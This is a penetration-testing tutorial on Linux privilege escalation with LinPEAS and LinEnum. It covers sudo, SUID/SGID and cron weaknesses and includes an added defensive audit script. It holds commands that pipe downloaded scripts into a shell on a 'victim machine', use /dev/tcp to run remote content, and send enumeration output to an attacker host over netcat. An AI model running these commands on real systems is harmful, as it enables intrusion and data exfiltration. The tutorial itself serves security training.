🍎Linux Privilege Escalation

Introduction

Privilege escalation is the process of exploiting a vulnerability or weakness in a system or application to gain elevated privileges or access to resources that are normally restricted. In a Linux environment, there are various techniques that can be used to escalate privileges. In this article, we will explore 11 techniques for Linux privilege escalation with examples for each of them.

Linux enumeration to escalate privileges

Enumeration is key to every successful attack. It is a critical phase in hacking systems and a vital part of information gathering. During this phase, we establish a connection between ourselves and the target (locally or remotely) to gather as much information as possible and decide on an attack vector. To enumerate a Linux host, you can use a very useful utility such as LinEnum or linpeas, both of which are available on GitHub (the LinPEAS download commands are given in the next section).

How to Get LinPEAS

There are several ways to download LinPEAS:

  1. From GitHub:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

  2. Without curl (using python):

python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

  3. Without curl (using python3):

python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

How to Run LinPEAS

Locally:

./linpeas.sh

Remote Network:

  • Host as Server:

    1. Run sudo python3 -m http.server 80 on the host to start an HTTP server.

    2. On the victim machine: curl 10.10.10.10/linpeas.sh | sh

  • Victim as Server (requires netcat):

    1. On the victim machine: sudo nc -q 5 -lvnp 80 < linpeas.sh

    2. On the host: cat < /dev/tcp/10.10.10.10/80 | sh

From Memory (requires netcat):

  • Host as Server:

    1. Run nc -lvnp 9002 | tee linpeas.out on the host to capture output.

    2. On the victim machine: curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002

Options

  • -a (all checks except regex): Performs most intensive checks (including brute-forcing users).

  • -r (regex checks): Enables searching for hundreds of API keys. (Takes time)

  • -o (only specific checks): Select specific checks to run (comma-separated list).

  • -P (password): Specify a password for sudo and brute-forcing users.

How to use in a few steps:

  1. Download LinEnum or Linpeas from github to your victim machine.

  2. Edit the permissions: chmod +x LinEnum.sh or chmod +x linpeas.sh

  3. Run the script: ./LinEnum.sh or ./linpeas.sh

Download LinEnum/Linpeas from your attacker machine to victim machine:

  1. Download LinEnum/linpeas.sh from github to your own machine.

  2. Host the file on your machine by executing the following command, which starts a local web server for you on port 8000: python3 -m http.server

  3. Download the file from our server: wget <attacker ip>:8000/LinEnum.sh or wget <attacker ip>:8000/linpeas.sh

  4. Edit the permissions: chmod +x LinEnum.sh / chmod +x linpeas.sh

  5. Run the script: ./LinEnum.sh / ./linpeas.sh

Analyzing LinPEAS Output for Privilege Escalation

The output generated by LinPEAS can be extensive, but the key is to focus on the sections relevant to privilege escalation. Look for highlighted areas, particularly those indicating potential misconfigurations or vulnerabilities.

Pay attention to sections related to:

  • Sudo Permissions: Check for overly permissive sudo rules that grant unnecessary access to commands.

  • SUID/SGID Binaries: Analyze binaries with the SUID or SGID bit set, especially those owned by root, as they might allow for privilege escalation.

  • Cron Jobs: Examine cron jobs running with root privileges, as misconfigured cron jobs can be hijacked to execute arbitrary commands.

Remember: LinPEAS helps identify potential vulnerabilities; thoroughly investigate any findings and verify their exploitability before drawing conclusions.

Common Privilege Escalation Techniques Identified by LinPEAS

Exploiting Sudo Rights and Misconfigurations

The sudo command in Linux allows a user to execute commands as another user, typically root. While intended for administrative convenience, misconfigured sudo rights can be an attacker’s goldmine.

Imagine a user account with sudo access to run a specific command, say, vi, meant for editing files. Now, if this sudo permission doesn’t restrict the user from passing arguments to vi, an attacker could use this to execute system commands, potentially leading to a full system takeover.

LinPEAS excels in finding such misconfigurations. It scans the system’s sudoers file, which dictates sudo permissions, and highlights any potentially dangerous configurations.

Leveraging SUID and SGID Binaries

SUID (Set owner User ID) and SGID (Set owner Group ID) are special permissions that allow users to execute a file with the permissions of the file owner or group, respectively. While designed for legitimate purposes, misusing SUID/SGID binaries can be dangerous.

For instance, suppose an attacker finds a SUID binary owned by root that has a vulnerability allowing arbitrary command execution. The attacker can exploit this to gain a root shell, essentially taking full control of the system.

LinPEAS hunts for such binaries. It searches the entire file system for files with the SUID/SGID bit set and flags any potentially dangerous files, especially those owned by root.
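The three checklist items above (sudo rules, SUID/SGID binaries, cron jobs) and the two sections that explain them describe what LinPEAS looks for. The POSIX shell script below is an added example, not part of LinPEAS or of the original article: it turns the same three checks into a small defender-side audit that can be run over a captured sudoers or crontab dump, or on the live host, and compares the set-id listing against a baseline so only deviations from a known-good image are reported. The function names, the `/etc/setid.baseline` path and the sample inputs in the comments are this example's own assumptions; it assumes only POSIX sh with grep, awk, find, ls and cut.

```shell
#!/bin/sh
# Added audit helpers, not part of LinPEAS or the original article. Each check
# reads its input as text or a file path, so it can be run over a captured
# sudoers/crontab dump as well as on the live host (see the --live block).
# Assumes POSIX sh with grep, awk, find, ls and cut.

# Sudo: print rules that grant NOPASSWD, a blanket ALL command, or an
# interactive editor such as vi (which, as the article notes, can run
# commands from inside the editor). Input: sudoers-format lines on stdin;
# comments and blank lines are skipped.
flag_risky_sudo_rules() {
    grep -Ev '^[[:space:]]*(#|$)' \
    | grep -E 'NOPASSWD|[[:space:]]ALL[[:space:]]*$|(^|[[:space:]/])vim?([[:space:]]|$)'
}

# SUID/SGID: list set-id regular files under $1 that do not appear in the
# baseline file $2 (one expected absolute path per line, e.g. taken from a
# golden image; defaults to an empty baseline). Anything printed is a
# deviation to investigate, e.g. an unknown root-owned binary.
unexpected_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
    | grep -vxF -f "${2:-/dev/null}"
}

# Cron: for system crontab lines in the 7-field form
# "min hour dom mon dow user command", print the command path when that file
# is writable by "other" (then any local user can change what root runs).
world_writable_cron_targets() {
    grep -Ev '^[[:space:]]*(#|$)' \
    | awk '{ print $7 }' \
    | while IFS= read -r target; do
          [ -f "$target" ] || continue
          # character 9 of the ls mode string is the "other" write bit
          case "$(ls -ld "$target" | cut -c9)" in
              w) printf '%s\n' "$target" ;;
          esac
      done
}

# Live run: sh audit.sh --live. /etc/setid.baseline is a hypothetical
# baseline file you maintain; the other paths are the standard locations.
if [ "${1:-}" = "--live" ]; then
    echo "== risky sudo rules =="
    cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | flag_risky_sudo_rules
    echo "== set-id files not in baseline =="
    unexpected_setid_files / /etc/setid.baseline
    echo "== world-writable cron targets =="
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | world_writable_cron_targets
fi
```

The sudo check deliberately flags group rules such as `%sudo ALL=(ALL:ALL) ALL` too: whether a blanket rule is acceptable is a policy decision, so the script reports it and leaves the judgement to the reviewer, which is the same "verify before concluding" discipline the article recommends for LinPEAS output.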

Below we will be discussing 11 privilege escalation techniques in detail.

1- Exploiting SUID Executables
